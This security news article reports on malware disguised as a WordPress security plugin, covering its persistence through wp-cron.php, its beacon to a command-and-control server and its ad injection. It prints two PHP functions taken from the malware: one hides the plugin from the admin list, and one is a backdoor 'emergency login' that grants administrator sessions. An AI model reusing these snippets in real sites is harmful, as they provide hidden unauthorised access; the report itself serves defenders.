A sophisticated malware variant masquerading as a legitimate WordPress security plugin has been identified, capable of providing attackers with persistent access to compromised websites.

The malicious code appears in the file system under innocuous names such as ‘WP-antymalwary-bot.php’ or ‘wp-performance-booster.php’, creating a facade of legitimacy while harboring dangerous capabilities including remote code execution, administrator access provision, and malicious code injection.

This deceptive malware contains several functions that allow attackers to maintain backdoor access, execute arbitrary code remotely, and inject malicious JavaScript responsible for serving unwanted advertisements.

The plugin’s design includes mechanisms to ping Command & Control (C&C) servers, providing attackers with real-time information about infected sites and enabling coordinated attacks across compromised platforms.

Wordfence researchers identified the malware during a routine site cleanup on January 22, 2025, noting its unusual sophistication and the careful effort to mimic legitimate plugin architecture.

The security team subsequently developed detection signatures and released them to premium customers by January 24, with free version users scheduled to receive protection by May 23, 2025.

The malware’s insidious nature lies in its ability to reinfect websites even after apparent removal.

It achieves this persistence by modifying the WordPress wp-cron.php file, which automatically reinstalls the malicious plugin if deleted.

This creates a challenging remediation scenario for website administrators who may believe they’ve successfully removed the threat.

What makes this threat particularly concerning is its ability to communicate with a C&C server located in Cyprus. Every minute, the malware sends the infected site’s URL and a timestamp, enabling attackers to maintain an updated inventory of compromised websites.

Sophisticated Evasion Techniques

The malware employs several methods to avoid detection, most notably by hiding itself from the WordPress dashboard through specialized functions:-

// Function to hide plugin from list
function hide_plugin_from_list($plugins) {
    if (is_admin() && isset($plugins[plugin_basename(__FILE__)])) {
        unset($plugins[plugin_basename(__FILE__)]);
    }
    return $plugins;
}
add_filter('all_plugins', 'hide_plugin_from_list');

This deception extends to how it gains unauthorized access. The malware implements an emergency login function that bypasses normal authentication by using a predefined password parameter.

When triggered, it automatically grants administrator privileges by hijacking the first administrator account it finds:-

function emergency_login_all_admins() {
    if (isset($_GET['emergency_login']) && $_GET['emergency_login'] === [REDACTED]) {
        $admins = get_users(['role' => 'administrator']);
        if (!empty($admins)) {
            $admin = reset($admins);
            wp_set_auth_cookie($admin->ID, true);
            wp_redirect(admin_url());
            exit;
        }
    }
}

This emerging threat represents a concerning evolution in WordPress-targeted malware, combining legitimate-appearing code structures with persistent infection mechanisms and sophisticated backdoor capabilities.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy